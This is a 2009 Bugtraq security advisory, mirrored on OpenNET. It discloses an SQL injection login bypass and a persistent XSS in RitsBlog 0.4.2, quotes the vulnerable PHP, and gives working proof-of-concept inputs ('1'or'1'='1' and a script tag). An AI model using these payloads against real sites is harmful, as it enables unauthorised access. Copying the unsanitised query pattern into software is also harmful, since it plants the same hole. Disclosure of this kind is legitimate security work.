The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability /


<< Previous INDEX Search src / Print Next >>
Date: Mon, 2 Mar 2009 22:52:02 +0100
Subject: RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / 
        XSS Persistent Vulnerability
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <str0ke@milw0rm.com.>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: antivirus-gw at tyumen.ru


*******   Salvatore "drosophila" Fresta   *******

[+] Application: RitsBlog
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/

[+] Bugs: [A] SQL Injection
          [B] XSS Persistent

[+] Exploitation: Remote
[+] Date: 02 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: [email protected]


*************************************************

[+] Menu

- [1] Bugs
- [2] Code
- [3] Fix



*************************************************

[+] Bugs

- [A] SQL Injection


[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php

This blog is entirely vulnerable to SQL Injection.
The following is the vulnerable query that can be
used to bypass authentication.

In jobs.php:

if ($_GET[j] == "login"){
     if ($blog -> login($_GET[p])){
         $_SESSION[loggedin] = "ok";
         $_SESSION[userID] = $blog -> userID;
         echo "Password found. Loging in...";
         ....

In ritsBlogAdmin.class.php:

function login($password){
         global $db;
         $sql = "select * from users where secretWord  = '$password'";
         ...
}


- [B] XSS Persistent


[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php

In jobs.php:

if ($_POST[j] == "addComment"){
         echo $blog -> addComment($_POST[id], $_POST[name],
$_POST[body]);
}

In ritsBlogAdmin.class.php

function addComment($id, $name, $body){
         global $db;
         $sql = "INSERT INTO comments (name, postID, date, text)
VALUES('" . addslashes($name) . "','" . $id . "',NOW(),'" .
addslashes($body) . "')";
         ...
}


*************************************************

[+] Code

- [A] SQL Injection


http://www.site.com/path/blogAdmin/jobs.php?j=login&p=1'or'1'='1


- [B] XSS Persistent


It is possible using forms in the index.php or
to send over POST method the following values:

?j=addComment&id=54&name=myname&body=<script>alert('XSS');</script>

or

?j=addComment&id=54&name=<script>alert('XSS');</script>&body=body


*************************************************

[+] Fix

No fix.


*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру